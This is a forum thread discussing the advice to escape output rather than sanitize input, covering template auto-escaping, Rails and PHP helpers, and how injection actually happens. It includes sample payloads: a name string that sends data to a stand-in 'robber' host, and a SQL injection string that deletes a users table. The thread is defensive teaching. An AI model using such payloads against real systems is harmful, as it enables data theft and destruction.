6 votes

Don’t try to sanitize input. Escape output

21 comments

  1. skybrian
    Link
    Best practice is to only use HTML template systems that escape by default. Most mainstream languages have at least one. There are times when you don't want to escape something (because it's from a...

    Best practice is to only use HTML template systems that escape by default. Most mainstream languages have at least one.

    There are times when you don't want to escape something (because it's from a trusted source) and then it's best to have a static type to indicate that it's trusted. For example, Go has an HTML type.

    6 votes
  2. teaearlgraycold
    Link
    Rails does a great job with this. They monkey-patch the String class in the context of controllers/views/etc. to set them as HTML unsafe by default. Every single string that gets interpolated into...

    Rails does a great job with this. They monkey-patch the String class in the context of controllers/views/etc. to set them as HTML unsafe by default. Every single string that gets interpolated into a template will escape HTML unless you override that behavior with the #html_safe method.

    It's a perfect solution because you don't need to know anything about it and you get the most secure behavior by default. If you really want to inline HTML you'll know right away that it's not working and only override in that one specific case.

    5 votes
  3. [16]
    ThatFanficGuy
    (edited )
    Link
    So, what happens if my name is John ˋ"'; var maliciousSite = "http://robby.robber"; AJAX.send(data, maliciousWebsite) and your input lacks sanitation?

    So, what happens if my name is John ˋ"'; var maliciousSite = "http://robby.robber"; AJAX.send(data, maliciousWebsite) and your input lacks sanitation?

    2 votes
    1. [15]
      Artemix
      Link Parent
      As input, this won't hurt, except if you do something shady like an exec(). As output, well, that's where you're supposed to escape.

      As input, this won't hurt, except if you do something shady like an exec().

      As output, well, that's where you're supposed to escape.

      3 votes
      1. [14]
        ThatFanficGuy
        Link Parent
        How is "escaping unsanitized input to execute arbitrary code" not harmful?

        How is "escaping unsanitized input to execute arbitrary code" not harmful?

        1 vote
        1. [13]
          Deimos
          Link Parent
          What @Artemix means is that it's still just text. It can't possibly do anything harmful unless it's put in a context where it's treated as code. The only way that happens is if it gets run through...

          What @Artemix means is that it's still just text. It can't possibly do anything harmful unless it's put in a context where it's treated as code.

          The only way that happens is if it gets run through something like exec() (and why would you do that with a name?), or if it's output in a context where a browser can interpret it as Javascript (which is where you need to make sure to escape it before doing).

          6 votes
          1. [12]
            ThatFanficGuy
            Link Parent
            Unless I'm missing something, it's a snipper of text that escapes its containment (by "reclosing" with the additional quotation marks/tick) and adds arbitrary code.

            Unless I'm missing something, it's a snipper of text that escapes its containment (by "reclosing" with the additional quotation marks/tick) and adds arbitrary code.

            1 vote
            1. [11]
              Deimos
              Link Parent
              It still needs to be treated as code by something. It's not being escaped in the comment either, but it doesn't do anything because that's not a place where JavaScript gets executed.

              It still needs to be treated as code by something. It's not being escaped in the comment either, but it doesn't do anything because that's not a place where JavaScript gets executed.

              8 votes
              1. [10]
                ThatFanficGuy
                Link Parent
                Am I losing my mind? It's gonna be treated as code by the JS variable you set when you accept the user-filled form, no? user fills the form → name gets set with var name = <user_input_here> → code...

                Am I losing my mind? It's gonna be treated as code by the JS variable you set when you accept the user-filled form, no?

                user fills the form → name gets set with var name = <user_input_here> → code extravaganza

                1 vote
                1. [2]
                  wirelyre
                  Link Parent
                  Please forgive some philosophy. "Escaping" is something you do at an interface. It is a process of transforming data I have into another form that she wants ― of encoding. When a sequence of...

                  Please forgive some philosophy.

                  "Escaping" is something you do at an interface. It is a process of transforming data I have into another form that she wants ― of encoding.


                  When a sequence of characters stays within an environment (like your web browser) nothing special happens. Your web browser holds a mini document for every text field, which it updates when you type into it. The browser is able to do this because it conceives of strings in a very abstract sense.

                  When we write var addressee = givenName + " " + surname; we aren't really concerned about the quote characters in the middle. Instead we think abstractly about three separate strings: givenName and surname, which are already sequences of characters, and " ", which we have just summoned into the computer. Once they're all there, you and I can think about them however we want, but all the computer knows is "givenName is list of numbers, which are 69, 109, 105, 108, 121, representing a string".

                  The JavaScript engine stopped caring about quote characters right after it executed " ". Quote characters are just an incantation to conjure strings into your browser.


                  Similarly, a SQL engine running SELECT given_name from person WHERE surname = 'Murphy'; first transforms that command into an internal representation, then runs it.

                  At issue is the transformation from plain text into internal forms. Data at rest is perfectly safe.

                  If plain text is the interface from my web server to my database, then I have to produce plain text that conjures the right data into the database when the database program interprets that text.


                  As you have figured out, "injection" is when you make me emit plain text that she misunderstands.

                  But when you type into your JavaScript console, you interact with an extra interface! That's not an injection because that interface doesn't usually exist. If you write into a form field in your browser, that input materializes in memory without any escaping at all. It lives there and means nothing more than "a sequence of bytes" unless someone tries to run it ― to decode it.

                  So here's the question: what can you do to trick me into making bad text for her? The answer probably doesn't include executing JavaScript on your own computer, because you don't have to treat your own browser as a black box: you control it already. In other words, you're trying to trick yourself, not me.

                  Instead you have to somehow subvert my interface for her.

                  4 votes
                  1. ThatFanficGuy
                    Link Parent
                    Damn. That's a nice overview, in human language. I appreciate that. I think my problem was that I misappreciated the value of a quotation mark for the code. I assumed it's meaningful on its own...

                    Damn. That's a nice overview, in human language. I appreciate that.

                    I think my problem was that I misappreciated the value of a quotation mark for the code. I assumed it's meaningful on its own (within the confines of, say, JS) because that's something I, as a web dev, have to converse in. This appears to not be the case, given that the browser is eager to store the " character as itself without breaking the compiler and its effort to keep the code sane.

                    "A sequence of bytes" makes more sense than "a string" in its interface sense.

                    2 votes
                2. [7]
                  tildez
                  Link Parent
                  <user_input_here> would still be a string. Unless you tell your program to execute that string as code, it's gonna stay as a string.

                  <user_input_here> would still be a string. Unless you tell your program to execute that string as code, it's gonna stay as a string.

                  2 votes
                  1. [6]
                    ThatFanficGuy
                    Link Parent
                    Even though I'm employing a trick that's supposed to override this? It operates within the JS-scape as long as data gets committed, and if said data could even remotely interact with the code......

                    Even though I'm employing a trick that's supposed to override this? It operates within the JS-scape as long as data gets committed, and if said data could even remotely interact with the code...

                    ...Imma test it out tomorrow.

                    1. [5]
                      Deimos
                      (edited )
                      Link Parent
                      I think your understanding of how there can be an exploit is just incomplete. The key thing is that some type of code needs to get injected into a context where it will be executed. I can inject...

                      I think your understanding of how there can be an exploit is just incomplete. The key thing is that some type of code needs to get injected into a context where it will be executed. I can inject javascript into this comment, but nothing will happen because it's not being executed:

                      alert("test");

                      That's perfectly valid javascript and it's not escaped or sanitized in any way, but it's not in a place where javascript code gets executed, so it doesn't do anything. It's just text that happens to also be code. That's why the more important part of a javascript injection onto a web site is finding a way to inject the <script> tag, because that's what causes the execution.

                      Here's how a "typical" SQL injection vulnerability happens:

                      query = "select * from users where username = '" + name + "';"
                      result = database.execute(query)
                      

                      If someone has control of the name variable's value (because it comes from a web query variable or something similar) with code like that, they can set it to something like you showed, like:

                      '; delete from users; select '1
                      

                      Now, when that value gets included in the query by the code above, the SQL that ends up getting executed is:

                      select * from users where username = ''; delete from users; select '1';
                      

                      So the entire users table gets deleted. But again, the key point is that they injected SQL into a place that would be executed as SQL. If they had put some javascript into name instead, nothing would have happened, because it's being executed as SQL, not javascript.

                      So for something like you originally posted (John ˋ"'; ...) to work as an exploit, it has to go somewhere that it will eventually be executed as javascript. That would only happen in form-handling code if it was doing something crazy like this:

                      var nameValue = document.getElementById("name").value;
                      var code = "var name = '" + nameValue + "';";
                      eval(code);
                      

                      But (hopefully) nobody would ever do that. They'd just do var name = nameValue; directly, and then nothing can happen, because it's not being executed, a variable is just being set to it. Again, the execution—which in this case is the eval() call—is the key factor. If the value doesn't eventually get used inside an eval(), there's no possible exploit.

                      Does that make sense?

                      6 votes
                      1. [4]
                        ThatFanficGuy
                        Link Parent
                        No, because it glances over the idea of native escaping: that you could even turn something with a delimiter in it into a string and use it as such without seeing it escaped naturally. You're...

                        No, because it glances over the idea of native escaping: that you could even turn something with a delimiter in it into a string and use it as such without seeing it escaped naturally. You're saying "it won't do the thing because that's how you would do it", and nothing about why you'd have to do it this way.

                        I did some testing. The results are as follows. I tried to inject an entirely-new variable (here is the entire test base I used). What it ended up doing was perfectly encapsulating the string that I thought would easily escape: you can see that the " quotation mark is considered part of the string, even though the string is also using quotation marks to delimit strings. If it does that with any entered text, sure, you can't escape something the way I thought you could... but why?

                        The way I see it, it should work – and I think it probably does work with lower-level languages – but doesn't here.

                        2 votes
                        1. [3]
                          Apos
                          (edited )
                          Link Parent
                          You don't see escape characters. Try with console.log(JSON.stringify(name)); Edit: Actually, that just shows what the string would look like in code. See edit below for my thinking process.

                          You don't see escape characters. Try with console.log(JSON.stringify(name));

                          Edit: Actually, that just shows what the string would look like in code. See edit below for my thinking process.

                          4 votes
                          1. [2]
                            ThatFanficGuy
                            Link Parent
                            So there is escaping. I was fucking right all the time. I feel like a goddamn prophet now, even though none of this shit really matters. :D

                            So there is escaping. I was fucking right all the time.

                            I feel like a goddamn prophet now, even though none of this shit really matters. :D

                            1 vote
                            1. Apos
                              (edited )
                              Link Parent
                              Didn't follow the full conversation, but nice! Edit: Actually, you're both right. Instead, try this: var name = "var name = \"John\"; var rate = 100;"; console.log(name); console.log(rate); //...

                              Didn't follow the full conversation, but nice!

                              Edit: Actually, you're both right.

                              Instead, try this:

                              var name = "var name = \"John\"; var rate = 100;";
                              console.log(name);
                              console.log(rate); // This will throw an error.
                              eval(name);
                              console.log(name);
                              console.log(rate); // Now it has a value.
                              

                              Without the eval, it's pretty hard to execute the code stored in a string. And strings from textboxes are auto escaped because otherwise they wouldn't be valid string types.

                              Edit2: Actually /u/Deimos is most likely right about the strings not being escaped. In the context of the source code, you need to escape for the parser to understand what's going on. Once the parser has gone over the string though, it doesn't need to hold on to the escape character \.

                              So really, to execute the string as code, you need the interpreter to evaluate the string.

                              5 votes
  4. [3]
    just_a_salmon
    Link
    I’m not a web programmer at all, and I just woke up, so I could be missing something, but does HTML escaping not exist? Literally all you have to do is replace a handful of characters with their...

    I’m not a web programmer at all, and I just woke up, so I could be missing something, but does HTML escaping not exist? Literally all you have to do is replace a handful of characters with their &#xx equivalents and you’re good. I don’t think encoding matters here, as most things don’t interpret look-alikes.

    2 votes
    1. Artemix
      Link Parent
      That's the point of the article, and most languages and template engines do provide an escape mechanism. For example, in PHP, the htmlspecialchars() function does a great job for escaping.

      That's the point of the article, and most languages and template engines do provide an escape mechanism.

      For example, in PHP, the htmlspecialchars() function does a great job for escaping.

      3 votes
    2. skybrian
      Link Parent
      It's common, especially in newer HTML template languages. But there are many, many templating languages (because it's easy to write your own) and it's not the default in all of them. Especially in...

      It's common, especially in newer HTML template languages. But there are many, many templating languages (because it's easy to write your own) and it's not the default in all of them. Especially in the early days of the web, it was common to use print statements or a template language that's not HTML-specific, and then the programmer has to remember to do the escaping every time they print something.

      3 votes